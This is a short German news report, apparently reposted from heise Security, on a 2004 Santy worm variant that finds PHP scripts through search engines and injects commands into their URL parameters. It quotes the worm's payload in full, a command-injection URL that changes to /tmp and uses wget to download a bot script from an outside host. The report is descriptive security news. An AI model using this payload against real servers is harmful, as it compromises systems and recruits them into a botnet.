Wurm attackiert PHP-Skripte
Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700
2004-12-26 00:00:00 2004-12-26 00:00:00 admin
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;
Ãberprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
hiese.de
Say thank you!
You like the article and want to thank the author? Send him an amount of your choice.
Say thanks!
Ratings
Here you can write a comment
Related topics
eBay zu Geldstrafe verurteilt
Ein Geschworenengericht in den USA hat eBay eine Last von 35 Mil. Dollar ( 30 Mil. Euro ) auferlegt, die der Firma "MercExchange" zu zahlen sind. Der Vorwurf lautete: eBay hat Ideen von dem Gründer von MercExchange für ein Onlineauktionshaus "geklaut" ...
Autor :
admin
Category:
Software & Web-Development
Maguma Workbench Version 2.1 jetzt erhältlich!
Maguma Workbench, die neueste PHP IDE mit Plugin-Architektur, ist ab sofort in der neuesten Version 2.1 auf unserer Webpage, www.maguma.com, erhältlich (30-Tage Testversion unter http://support.maguma.com/download/ zu finden). In der Version 2.1 haben wir ...
Autor :
admin
Category:
Software & Web-Development
Erneut Sicherheitslücke in sendmail
Erneut ist eine kritische Sicherheitslücke in sendmail bekannt geworden. Alle Versionen der Open-Source-Variante des Message Transfer Agent (MTA) vor Version 8.12.9 sowie alle kommerziellen sendmail-Ausgaben für Unix und Windows weisen eine Schwachstelle ...
Autor :
admin
Category:
Software & Web-Development
Adobe Photoshop 7.0 ist verfügbar
Adobes Bildbearbeitungssoftware Photoshop 7.0 ist jetzt in Deutschland verfügbar. Der Bildbearbeitungsklassiker bietet in der neuen Version 7.0 zahlreiche neue Werkzeuge und Effekte und besitzt eine überarbeitete Oberfläche, die sich nun für jeden einzeln ...
Autor :
admin
Category:
Software & Web-Development
Muss Microsoft MS Office für Linux anbieten?
US-Bundesstaaten verlangen harte Auflagen für Microsoft Die neun US-Bundesstaaten, die der Einigung zwischen dem US-Justizministerium und Microsoft nicht zugestimmt haben, verlangen harte Auflagen gegen den Software-Konzern, das berichtet das W ...
Autor :
admin
Category:
Software & Web-Development
Datenschutz bei der eigenen Homepage - auf was ist künftig zu achten?
Der Schutz von Daten wird in Deutschland groß geschrieben und betrifft durchaus auch kleine und überwiegend privat genutzte Homepages. Das Problem liegt in den Cookies, mit denen jeder Besucher einer Seite in Berührung kommt. ...
Autor :
hostbar_danny
Category:
Miscellaneous
